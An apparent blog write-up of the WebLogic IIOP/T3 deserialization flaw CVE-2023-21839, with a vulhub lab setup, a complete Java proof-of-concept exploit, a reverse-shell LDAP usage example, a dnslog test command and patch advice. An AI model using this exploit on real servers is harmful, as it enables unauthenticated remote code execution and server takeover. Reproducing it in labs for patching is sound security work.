WebLogic Deserialization Vulnerability — CVE-2023–21839
Introduction
WebLogic is an application server produced by Oracle Corporation in the United States. To be precise, it is a middleware based on JAVAEE architecture. WebLogic is a Java application server for developing, integrating, deploying, and managing large-scale distributed Web applications, network applications and database applications.
Vulnerability Overview
CVE-2023–21839
Due to flaws in the Weblogic IIOP/T3 protocol, when the IIOP/T3 protocol is enabled, unauthenticated attackers are allowed to attack WebLogic Server with security risks through the IIOP/T3 protocol network access. A successful WebLogic Server may be taken over by an attacker to execute arbitrary commands, resulting in a server crash or severe sensitive data leakage.
Affect Versions
- Weblogic 12.2.1.3.0
- Weblogic 12.2.1.4.0
- Weblogic 14.1.1.0.0
Environment
You can use vulhub to build a vulnerability environment:
https://github.com/vulhub/vulhub/tree/master/weblogic/CVE-2023-21839
clone project:
git clone https://github.com/vulhub/vulhub.gitIn the /WebLogic/CVE-2023–21839/ directory, use the following command to download and start the 12.2.1.3 version of WebLogic:
docker-compose up -dThen visit http://your-ip:7001/console, you can see the login page
Vulnerability Reappearance
You can use the DXask88MA master’s tool:
The selected sink point is at
weblogic.deployment.jms.ForeignOpaqueReference.classYou can also choose to use the 4ra1n master tool to simulate data packets with go:
The selected sink point is at
weblogic.jndi.internal.ForeignOpaqueReference.classPOC:
import javax.naming.Context;import javax.naming.InitialContext;import javax.naming.NamingException;import java.lang.reflect.Field;import java.util.Hashtable;import java.util.Random;
public class CVE_2023_21839 { static String JNDI_FACTORY="weblogic.jndi.WLInitialContextFactory"; static String HOW_TO_USE="[*]java -jar Target ip:port ldap address\n e.g. java -jar 192.168.220.129:7001 ldap://192.168.31.58:1389/Basic/ReverseShell/192.168.220.129/1111";
private static InitialContext getInitialContext(String url)throws NamingException { Hashtable<String,String> env = new Hashtable<String,String>(); env.put(Context.INITIAL_CONTEXT_FACTORY, JNDI_FACTORY); env.put(Context.PROVIDER_URL, url); return new InitialContext(env); } public static void main(String args[]) throws Exception { if(args.length <2){ System.out.println(HOW_TO_USE); System.exit(0); } String t3Url = args[0]; String ldapUrl = args[1]; InitialContext c=getInitialContext("t3://"+t3Url); Hashtable<String,String> env = new Hashtable<String,String>(); env.put(Context.INITIAL_CONTEXT_FACTORY, "com.sun.jndi.rmi.registry.RegistryContextFactory"); weblogic.deployment.jms.ForeignOpaqueReference f=new weblogic.deployment.jms.ForeignOpaqueReference(); Field jndiEnvironment=weblogic.deployment.jms.ForeignOpaqueReference.class.getDeclaredField("jndiEnvironment"); jndiEnvironment.setAccessible(true); jndiEnvironment.set(f,env); Field remoteJNDIName=weblogic.deployment.jms.ForeignOpaqueReference.class.getDeclaredField("remoteJNDIName"); remoteJNDIName.setAccessible(true); remoteJNDIName.set(f,ldapUrl); String bindName = new Random(System.currentTimeMillis()).nextLong()+""; try{ c.bind(bindName,f); c.lookup(bindName); }catch(Exception e){ }
}}Use dnslog directly to test and download the Jar file:
https://github.com/DXask88MA/Weblogic-CVE-2023-21839/releases/tag/CVE-2023-21839
Executing an order:
java -jar Weblogic-CVE-2023-21839.jar 127.0.0.1:7001 ldap://81c95c8f.dns.1433.eu.org/testCheck the dnslog, the request is received, and the vulnerability verification is successful
Remediation
- Download the latest patch, link: https://support.oracle.com/rs?type=doc&id=2917213.2
- Restrict T3 protocol access
Reference link:
Originally Published in https://tutorialboy24.blogspot.com/2023/04/weblogic-deserialization-vulnerability.html
